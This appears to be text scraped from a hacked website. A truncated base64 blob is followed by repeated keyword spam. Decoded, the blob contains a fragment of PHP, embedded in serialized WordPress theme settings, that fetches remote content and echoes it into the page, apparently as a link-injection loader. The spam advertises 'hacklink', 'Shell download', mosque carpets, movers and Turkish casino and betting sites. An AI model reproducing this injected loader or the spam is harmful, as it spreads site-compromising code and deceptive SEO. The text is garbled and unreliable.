zdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykpewpAJGdpdHQgPSBmaWxlX2dldF9jb250ZW50cygkeCk7Cn0KZWNobyAkZ2l0dDsKCj8+IjtzOjE5OiJodG1sX3NjcmlwdHNfaGVhZGVyIjtzOjA6IiI7czoxOToiaHRtbF9zY3JpcHRzX2Zvb3RlciI7czowOiIiO3M6MjM6Imh0bWxfc2NyaXB0c19hZnRlcl9ib2R5IjtzOjA6IiI7czoyNDoiaHRtbF9zY3JpcHRzX2JlZm9yZV9ib2R5IjtzOjA6IiI7czoxNToiaHRtbF9jdXN0b21fY3NzIjtzOjA6IiI7czoyMjoiaHRtbF9jdXN0b21fY3NzX3RhYmxldCI7czowOiIiO3M6MjI6Imh0bWxfY3VzdG9tX2Nzc19tb2JpbGUiO3M6MDoiIjtzOjE3OiJwZXJmX2luc3RhbnRfcGFnZSI7aTowO3M6MjE6ImxhenlfbG9hZF9iYWNrZ3JvdW5kcyI7aToxO3M6MTY6ImxhenlfbG9hZF9pbWFnZXMiO2k6MDtzOjI2OiJmbGF0c29tZV9kaXNhYmxlX3N0eWxlX2NzcyI7aTowO3M6MTM6ImRpc2FibGVfZW1vamkiO2k6MDtzOjE2OiJkaXNhYmxlX2Jsb2NrY3NzIjtpOjA7czoxNDoianF1ZXJ5X21pZ3JhdGUiO2k6MDtzOjExOiJzaXRlX2xvYWRlciI7aTowO3M6MTc6InNpdGVfbG9hZGVyX2NvbG9yIjtzOjU6ImxpZ2h0IjtzOjE0OiJzaXRlX2xvYWRlcl9iZyI7czowOiIiO3M6MTE6ImxpdmVfc2VhcmNoIjtpOjE7czoxODoic2VhcmNoX3BsYWNlaG9sZGVyIjtzOjA6IiI7czoxNDoiZ29vZ2xlX21hcF9hcGkiO3M6MDoiIjtzOjE2OiJtYWludGVuYW5jZV9tb2RlIjtpOjA7czoyOToibWFpbnRlbmFuY2VfbW9kZV9hZG1pbl9ub3RpY2UiO2k6MTtzOjIxOiJtYWludGVuYW5jZV9tb2RlX3BhZ2UiO2k6MDtzOjIxOiJtYWludGVuYW5jZV9tb2RlX3RleHQiO3M6MjQ6IlBsZWFzZSBjaGVjayBiYWNrIHNvb24uLiI7czo5OiI0MDRfYmxvY2siO2k6MDtzOjEyOiJmbF9wb3J0Zm9saW8iO2k6MTtzOjE1OiJwYXJhbGxheF9tb2JpbGUiO2k6MDtzOjE1OiJmbGF0c29tZV9zdHVkaW8iO2k6MTtzOjE4OiJ3cHNlb19wcmltYXJ5X3Rlcm0iO2k6MDtzOjM3OiJ3cHNlb19tYW5hZ2VzX3Byb2R1Y3RfbGF5b3V0X3ByaW9yaXR5IjtpOjA7czoxNjoid3BzZW9fYnJlYWRjcnVtYiI7aTowO3M6Mjg6Indwc2VvX2JyZWFkY3J1bWJfcmVtb3ZlX2xhc3QiO2k6MTtzOjk6Im9mX2JhY2t1cCI7czowOiIiO3M6MTE6Im9mX3RyYW5zZmVyIjtzOjA6IiI7fQ== 
hack forum hacklink Shell download cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami avizesi cami avizesi cami süpürgesi cami süpürgesi cami ısıtma cami ısıtma evden eve nakliyat evden eve nakliyat evden eve nakliyat evden eve nakliyat ofis taşıma yurtiçi evden eve nakliyat yurtiçi evden eve nakliyat içel evden eve nakliyat seo hizmeti Rulet Casino Slot Oyna Bahigo 1xbet Deneme bonusu Bahis siteleri Maç özetleri Bahsegel Canlı Casino Siteleri Sweet Bonanza Blackjack Casino Siteleri Rulet Oyna Canlı Casino google.com.tr Royalbet casino siteleri

hack forum hacklink Shell download cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami halısı cami avizesi cami avizesi cami süpürgesi cami süpürgesi cami ısıtma cami ısıtma evden eve nakliyat evden eve nakliyat evden eve nakliyat evden eve nakliyat ofis taşıma yurtiçi evden eve nakliyat yurtiçi evden eve nakliyat içel evden eve nakliyat seo hizmeti Rulet Casino Slot Oyna Bahigo 1xbet Deneme bonusu Bahis siteleri Maç özetleri Bahsegel Canlı Casino Siteleri Sweet Bonanza Blackjack Casino Siteleri Rulet Oyna Canlı Casino google.com.tr Royalbet casino siteleri